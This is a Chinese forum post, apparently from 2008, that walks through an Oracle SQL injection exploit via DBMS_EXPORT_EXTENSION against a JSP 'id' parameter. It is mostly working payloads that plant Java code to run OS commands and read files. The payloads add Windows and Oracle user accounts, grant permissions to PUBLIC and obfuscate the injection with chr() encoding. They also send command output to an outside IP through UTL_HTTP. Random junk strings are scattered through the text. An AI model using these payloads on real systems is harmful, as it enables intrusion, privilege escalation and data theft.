以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 6 i9 O# J( x- W) P4 N0 k" \
- H/ t& i8 |4 s* Z6 a /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) # H& q4 q, U4 g/ g* M2 ]) t- }# u4 p
的形式即可。(用" 'a'|| "是为了让语句返回true值)
2 f0 ^3 k" ^( G: T& I$ I- d语句有点长,可能要用post提交。 @6 _* P: v* ]+ F
以下是各个步骤: 4 V2 E( \1 t7 s" H1 h6 B
1.创建包
% a4 O! h6 _( u- \# ^3 {) v; L通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
- w7 ]; T; M, r/xxx.jsp?id=1 and '1'<>'a'||( 2 P2 d; W* A/ F9 F2 |- R
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% ]( C6 C9 c8 v3 o
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
# b9 G( a3 P z/ }new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}9 R8 C: y$ h: _( s7 D/ O
}'''';END;'';END;--','SYS',0,'1',0) from dual
8 y# H- U2 f+ `9 L% }3 [# {, ?) % i' x# I5 V2 T2 m, h- I
------------------------
5 b/ |& n, `2 t6 z! f( Z8 y m8 R如果url有长度限制,可以把readFile()函数块去掉,即: # I [' i: q& Q1 E
/xxx.jsp?id=1 and '1'<>'a'||(
, @7 ~* F) z/ G X$ dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 ^+ }0 ~" v8 c; Q5 i
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
_5 K X3 A K& I# Y9 Z% q4 znew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
/ @' S$ ]) ^/ m8 r ?# L% c& [! q}'''';END;'';END;--','SYS',0,'1',0) from dual
9 E3 n1 S1 u- X4 K2 m/ K$ n2 `) ' Q9 @8 @. M( v/ Y
同时把后面步骤 提到的 对readFile()的处理语句去掉。 $ _& K: P: F3 r! |# Z/ @
------------------------------
, M% ~, C3 r& J- A( V2.赋Java权限
1 ^; f* R! a+ h/ V# zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
' f. _ e+ E* }4 j3.创建函数 - `+ z7 y0 M) @/ K& S7 y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
5 {, c0 G _" P P" Y9 Bcreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
8 V3 S6 C: z2 f/ `select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ O+ F s/ p8 v
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual3 M; u& B8 w9 y0 E/ `* i# A7 Y& c
4.赋public执行函数的权限 # O5 n' D" y) l+ y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual# S% D1 o P x2 f8 I3 n9 q- x0 B
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual: D/ i, g7 Y) ?+ f% G! t1 Y9 N
5.测试上面的几步是否成功
# D5 S+ Q" m2 j2 \! n: q; Q0 sand '1'<>'11'||( 1 K @6 t/ m' Q) |9 f1 D
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
" X, j7 D$ X4 h- V7 X)
* \+ M( _4 X: x2 A, O& Wand '1'<>(
9 @, F- e" s: c% k# Fselect OBJECT_ID from all_objects where object_name ='LINXREADFILE'
" `9 Y3 b5 c' A3 ~) x/ `4 s3 D)
8 u4 n8 a$ o6 j* M6.执行命令: 9 V2 ~5 j$ s r, ?: ~" M! s6 `
/xxx.jsp?id=1 and '1'<>(
7 W# V B7 Q" J$ ?9 }2 A0 sselect sys.LinxRunCMD('cmd /c net user linx /add') from dual , f+ x, Y# `$ S2 `/ B: e
1 m( z8 @9 r( a7 Q" B
) : V0 v2 U- P. A7 e0 N
/xxx.jsp?id=1 and '1'<>(
) L- J9 r1 Y4 q$ [, b! `select sys.LinxReadFile('c:/boot.ini') from dual
/ }3 B7 @9 W/ i: ?
' T# Q4 }* a( l) ~$ ]( v)
0 b+ o5 z7 n$ T R2 d" \. w7 k% l
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
5 j/ ~+ H) e" n# G7 R+ p如果要查看运行结果可以用 union : ' F! G9 m4 J9 m' |% u
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual3 o& o' o6 K3 @, V4 S! k4 m
或者UTL_HTTP.request(:
2 u/ I5 V7 @( I1 O. q) [/xxx.jsp?id=1 and '1'<>(
9 R' A$ H4 g1 m/ ~ n6 ~& g9 z% vSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual3 o% t# O3 J, r- O) K1 T% c6 V
)
; @# K; H0 f& |3 ~4 |- X8 G/xxx.jsp?id=1 and '1'<>(
, N$ ?. e' Z$ X. G- N* U/ k' w4 q6 JSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
! k1 e3 \$ J, J5 ]7 u) % n: G' l1 t0 m* U1 }
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
, a& v* Y6 }4 M) {" }- ^5 q$ W--------------------
6 y9 T1 P2 {6 i' }5 C6.内部变化
/ p& t* Z e0 S1 w$ _通过以下命令可以查看all_objects表达改变: / @0 N1 I& e( @! M; H- w' Y$ ]
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%') A5 _3 b2 J$ |* e2 m
7.删除我们创建的函数
7 {) \$ v9 {! a3 x Hselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''': P( K S( ^! O% j+ d# f
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual 5 O: c/ i8 L# C) O; U) `# ~
====================================================
3 n4 f, Z) i6 k全文结束。谨以此文赠与我的朋友。 1 ^! M |6 E1 [/ H3 W3 h' B
linx
7 L0 j4 n2 M: b" `* f- n124829445 2 i, Q7 I( [8 U, d/ ]1 w8 p
2008.1.12
6 E3 P( c! f# B& O5 clinyujian@bjfu.edu.cn
6 H9 {+ i6 o, C( H3 s8 X* z& t====================================================================== # i: p+ H/ _0 f# \
测试漏洞的另一方法: ) X0 e/ M! A, @/ G# L- j! P
创建oracle帐号: 3 r% i1 ]4 O8 R, A8 E
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''': Y$ q& A$ I) }9 E }
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual1 N* D& \# [$ I- @9 J+ c
即: 9 l; I2 m( l) o2 x
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),4 D7 _ T$ y' t5 z4 Q* G `
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual , q( f3 S; N' a# p
确定漏洞存在: / \ f, N( _/ B# w1 D. b0 R8 O
1<>( 1 ~: R' B8 c' C A
select user_id from all_users where username='LINXSQL' , i6 d, F. }! m1 ?
) 3 V4 l8 M8 I, H- \
给linxsql连接权限: 1 _% D! X3 A% K) D" p
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 V3 s) O, M, x1 n4 ~GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual # z& y* u6 A2 I8 C$ u8 f; d$ s
删除帐号: * `' u7 k$ N3 a; v
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* t$ j- I6 I4 [; e Z4 g
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
7 A; C# _4 c1 z6 m& v4 Z====================== ) {" j- I' Y9 I
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:$ V" ^2 L4 @& ~& {: _/ |+ I, @
1.jsp?id=1 and '1'<>(
2 ?6 `. @0 i, o: c. Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
6 W# c$ l1 Z3 ~! _create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual# N. ~) n0 g) G, m e
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
) ~% [' i* \4 m4 G1 m; g )+ }/ h' ]$ J6 z
) v% {, M( O9 w/ R" i( H
2 J/ b2 [ b( `- `% J
6 S, j, b- q( F$ G8 Z" y( L; x+ p
|
发表于 2012-12-18 12:21:48
收藏
支持
反对